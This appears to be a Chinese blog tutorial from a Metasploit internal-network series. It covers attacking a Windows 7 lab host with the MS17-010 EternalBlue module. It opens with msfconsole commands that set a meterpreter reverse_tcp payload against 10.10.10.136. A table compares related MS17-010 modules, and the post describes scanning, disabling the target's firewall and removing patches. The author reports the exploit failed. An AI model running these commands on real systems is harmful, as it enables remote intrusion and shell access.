metasploit内网篇之ms17_010_eternalblue 永恒之 蓝获取权限(五)

发布于:2025-03-16 ⋅ 阅读:(15) ⋅ 点赞:(0)
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/reverse_tcp
set rhost 10.10.10.136
set lport 4444
exploit

首先我们先搜索永恒之蓝模块

模块名称

功能描述

模块类型差异

目标系统差异

攻击或操作方式差异

exploit/windows/smb/ms17_010_eternalblue

利用 MS17 - 010 漏洞中的永恒之蓝(EternalBlue)技术,触发 Windows 内核池内存损坏,进而实现远程攻击

属于漏洞利用(exploit)模块,旨在直接利用漏洞获取系统权限或执行恶意操作

适用于多个 Windows 版本,如 Windows 7、Windows Server 2008 R2 等

通过引发内核层面的内存问题来达成攻击目的

exploit/windows/smb/ms17_010_psexec

借助 MS17 - 010 漏洞,利用 EternalRomance、EternalSynergy、EternalChampion 等技术,实现远程 Windows 系统的代码执行

同样是漏洞利用(exploit)模块,侧重于利用漏洞执行代码

支持多种 Windows 系统,包括 Windows 10、Windows Server 2012 等

利用特定技术组合来执行远程代码

auxiliary/admin/smb/ms17_010_command

作为辅助(auxiliary)模块,借助 MS17 - 010 漏洞相关技术,在远程 Windows 系统上执行命令

辅助模块,主要用于在已有漏洞基础上执行简单命令操作,并非直接获取权限

针对存在 MS17 - 010 漏洞的 Windows 系统

执行用户指定的命令

auxiliary/scanner/smb/smb_ms17_010

辅助扫描(scanner)模块,用于检测目标系统是否存在 MS17 - 010 的 SMB 远程代码执行漏洞

辅助扫描模块,核心功能是漏洞检测,而非攻击或执行操作

扫描可能存在该漏洞的 Windows 系统

通过特定检测机制判断系统是否存在漏洞

然后我们先使用扫描模块 扫描漏洞

这里我们需要设置目标信息

这里也可以设置为ip段 也可以设置并发线程 这里我不再演示

这个ad01没有

我们在设置别的

设置win7

这个的意思是 连接超时 那就应该是win7开启防火墙了

所以我们要把防火墙关掉

因为我们在一个域中 再加上我们的权限不够 所以我们要输入域控管理员的密码

输入成功后 我们进行关闭

然后我们再来运行

这个意思就是 可能有漏洞

那摩我们就要换一换扫描模块

我们要换成攻击模块

那我们就使用有win7的攻击模块

这里展示我们的攻击载荷

这个是我们的默认的攻击载荷

那摩我们开始设置

然后我们输入

run

开始执行

一直失败 那摩 我们就看看是不是打补丁了win7

这里我们已经把补丁全部删除

这里还是没有成功 博主这里不知道了

按道理就应该是能成功地